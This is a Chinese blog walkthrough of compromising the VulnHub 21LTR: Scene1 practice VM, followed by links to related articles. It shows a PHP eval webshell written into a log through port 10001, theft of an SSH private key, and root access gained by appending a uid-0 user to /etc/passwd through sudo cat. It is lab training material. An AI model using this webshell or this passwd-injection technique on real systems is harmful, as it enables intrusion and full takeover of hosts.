21LTR:Scene1超详细靶机实战

最新推荐文章于 2024-09-07 08:00:00 发布
最新推荐文章于 2024-09-07 08:00:00 发布
阅读量414 收藏 3
点赞数 7
分类专栏: vulnhub靶机 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68615160/article/details/140804448
版权

靶机下载链接:

https://www.vulnhub.com/entry/21ltr-scene-1,3/

一、靶机搭建

设置网卡模式为仅主机

 开机后ip地址在终端显示

 ip地址为192.168.2.120

二、端口扫描

注意将kali也添加一个仅主机模式,与靶机设置在同一网段下

nmap 192.168.2.120

发现开启21、22、80、10001端口

三、访问80端口

扫描个目录看看

 未发现有用的信息

我们F12查看页面源码可以发现一个用户和密码

logs             #账号
zg]E-b0]+8:(58G  #密码

 尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务

ls命令查看有一个文件

我们将其下载到本地查看

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

 发现是日志文件

我们想起来刚刚目录探测有一个logs目录,我们尝试访问

四、get shell

考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell

这里利用10001端口写入

telnet 192.168.2.120 10001
<?php eval($_POST[hack]);?>

 

再次查看日志,发现写入成功

 用蚁剑连接

连接成功

查看/etc/passwd的敏感信息

考虑到有ssh服务,我们可以使用密钥免密登录

读取密钥 /media/USB_1/Stuff/Keys/id_rsa

将其保存到本机上

 用finalshell选择密钥连接

连接成功

五、提权

sudo -l

发现不需要密码的只有cat命令,我们就用它去提权

我们想到可以利用cat命令进行高权限用户写入

写入一个高权限用户到/etc/passwd

openssl passwd 123456

先用kali生成加密后的密码

 然后新用户的格式为

newroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

 将newroot用户写入到/etc/passwd

sudo /usr/bin/cat >> /etc/passwd

然后切换用户

su newroot

提权成功!

橙子iiii
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 720
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
LQG-LTR:精馏塔多变量控制中的LqG/LTR方法-matlab开发
05-30
1. 精馏塔过程的数学模型,通常用状态空间形式表示。 2. Kalman滤波器的实现,用于估计系统的不确定状态。 3. LQG控制器的设计,包括权重矩阵的选择,以优化特定的性能指标。 4. 李雅普诺夫函数的构造和分析,确保...
21LTR: Scene 1靶机
m0_61995767的博客
07-30 571
21LTR: Scene 1打靶记录
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 405
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 375
21LTR:Scene1靶机,打靶文章
Vulnhub靶机 21 LTR-Scene1(渗透测试详细
2301_78721909的博客
07-30 370
Vulnhub靶机 21 LTR-Scene1详解(from wuhu)
21LTR-Scene靶机渗透测试
weixin_58786230的博客
07-30 423
【代码】21LTR-Scene靶机渗透测试。
21LTR.com_Scene1_2.120_v1.0靶机(详细,看了就会)
zdd1453691081的博客
07-30 360
【代码】21LTR.com_Scene1_2.120_v1.0靶机(详细,看了就会)
21LTR.com_Scene1_2.120靶机
2401_84564260的博客
07-30 569
创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。su切换newuser用户。查看靶机的mac地址。
Vulnhub靶机渗透之21LTRvunlhub
2301_77039831的博客
10-17 270
到这里有两种思路,因为可以通过root的cat命令读取文件,所以可以看/etc/shadow,也可以写入该文件。由于是php的日志所以思路是想办法把一句话写入这个页面,看了下其他大佬的WP,得访问10001端口。接下来是方法二,因为可以读取shadow文件,所以试图将root的shadow文件的密码进行破解。连接后看下敏感文件,结合靶机有ssh服务,尝试读取密钥,发现可以读取。先创建一个文件,内容是root的加密密码,然后使用john解密。先nmap扫一下,发现有21,22,80端口。
panel-navigation-rtl-ltr:带有RTL支持的精美面板导航
05-11
标题 "panel-navigation-rtl-ltr:带有RTL支持的精美面板导航" 暗示了这是一个设计用于后台管理界面(admin dashboard)的导航组件,它具备右到左(RTL)和左到右(LTR)的语言布局支持。这在处理多语言网站或者需要...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
《LtR特征提取器:深度探索学习排名与信息检索》 在信息检索(IR)领域,学习排名(Learning-to-Rank, LTR)是一种至关重要的技术,它通过机器学习方法来优化文档排序,以提高搜索结果的相关性。LtR特征提取器就是...
S905X3安卓9.0 安卓11 手柄驱动 调试命令 ampere:/ $ getevent -ltr add device 1
06-14
而`cat /sys/kernel/debug/usb/devices`则是Linux命令,用于查看USB设备的详细状态。在Android设备上,这个命令可以揭示连接到设备的所有USB设备的信息,包括它们的类型、速度、设备ID等。当尝试识别或调试一个手柄...
网络第五章:多路转接
qincjun的博客
09-05 419
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
观测云核心技术解密:eBPF Tracing 实现原理
观测云的博客
09-03 930
通过 eBPF,开发者可以在不修改内核源码的情况下,对内核功能进行扩展和监控。eBPF Tracing 利用这一技术,对系统调用、内核函数等进行跟踪,从而实现对应用行为的深入洞察。
计算机网络-VRRP工作原理
Linux基础知识、计算机网络基础学习分享。
09-03 657
初始化状态就是在设备上配置完成时的状态,Master状态为主设备的状态,Nackup状态为备份设备的状态,备份设备会监听主设备发送的Advertisement报文,当定时器时都没有收到主设备的报文时则备份设备切换为Master状态。R1与R2交换VRRP报文,优先级一样,通过比较接口IP地址选举Master路由器,由于R2的接口IP地址大于R1的接口IP地址,因此R2被选举为Master路由器。进行比较,先比较优先级,优先级大的优先,优先级相等则比较接口IP地址,IP地址大的优先,
200 Gb/s和400 Gb/s网络
最新发布
dncsk的专栏
09-07 1062
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值